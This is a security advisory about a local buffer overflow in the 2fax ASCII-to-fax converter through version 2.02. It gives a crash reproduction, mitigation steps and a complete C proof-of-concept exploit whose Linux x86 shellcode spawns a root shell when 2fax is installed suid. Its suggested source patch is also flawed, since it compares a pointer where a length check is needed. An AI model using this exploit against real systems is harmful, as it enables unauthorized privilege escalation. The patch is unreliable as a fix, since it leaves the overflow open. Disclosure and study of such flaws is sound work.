|
|
|
|
| |
| 2fax is a command line program which converts ASCII files into fax (tiff) formatted files. It works with Hylafax (Linux) and bgfax (DOS/Windows). It also uses PCX files for logos and signatures, which can be overlaid over the ASCII text. The program has been found to contain a security vulnerability that would allow a local attacker to gain elevated privileges. |
| |
Credit:
The information has been provided by Crazy Einstein.
|
| |
Vulnerable systems:
* 2fax version 2.02 and prior
Example:
When you execute 2fax program with -bpcx option putting in this option many symbols ( >212 ) program will make it SEGFAULT:
[root@ns 2fax-2.02]# ./2fax -bpcx:`perl -e 'print "A"x666'` aaa aaa
Segmentation fault (core dumped)
[root@ns 2fax-2.02]# gdb 2fax core
...
#0 0x41414141 in ?? ()
(gdb)
...
Therefore, we can execute arbitrary code with uid/gid of author of this program if this program has been set with suid bits.
Temporary solution:
1) Clear suid bit from program:
# chmod ug-s /path/to/2fax
2) Edit source of 2fax program:
...
char page_pcxfn[81]=""; /* page pcx file */
...
word setswitches(char *sw, word cmdline, word def)
{
...
case 17 :
if(&sw[l]<=81) { // make this check on length
strcpy(page_pcxfn,&sw[l]);
if (cmdline==0) page_pcxno=Openpcx(1,page_pcxfn); /*1.91*/
}
else printf("Error: Length of pcx file is too big (max 81)\n");
break;
...
Exploit code:
/*******************************************************************************
* *
* 2fax local PoC exploit *
* by Crazy Einstein [crazy_einstein@yahoo.com], Limpid Byte [lbyte.void.ru] *
* *
* Bug: Buffer Overflow in -bpcx option *
* Homepage of 2fax: http://www.atbas.org/ *
* *
* Solution: Don't set suid bit to 2fax program *
* *
*******************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#define MAX_SIZE 350
#define OFFSET -1100
#define tmpfile "/tmp/abcde0987654"
/* shellcode for Linux x86 by Grange */
char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/bin/sh";
long getesp() {
__asm__("movl %esp,%eax");
}
void usage(int argc, char **argv) {
printf("Local exploit for 2fax program (<= v2.02)\n by Crazy Einstein [crazy_einstein@yahoo.com], Limpid Byte [lbyte.void.ru]\n\n"
"Usage: %s </path/to/2fax> [offset]\n\n",argv[0]);
return;
}
int main(int argc,char **argv) {
char buf[MAX_SIZE], buf2[MAX_SIZE + 20], faxpath[100], *p, tmpexec[200];
int offset = OFFSET;
long ret;
if(argc<2) { usage(argc,argv); exit(-1); }
strcpy(faxpath,argv[1]);
if(argv[2]) offset=atoi(argv[2]);
bzero(buf,sizeof(buf));
bzero(buf2,sizeof(buf2));
ret=getesp()-offset;
printf("ret: 0x%x, offset: %d\n",ret,offset);
memset(buf,0x90,312-strlen(shellcode));
strcat(buf,shellcode);
strcat(buf,"AAAAAAAAAAAAAAAA");
while( (p=(char *)strstr(buf,"AAAA")) != NULL ) *(long*)p=ret;
sprintf(buf2,"-bpcx:%s",buf);
sprintf(tmpexec,"touch %s;rm -rf %s",tmpfile,tmpfile);
system(tmpexec);
execl(faxpath,faxpath,buf2,tmpfile,tmpfile,NULL);
return 0;
}
|
|
|
|
|
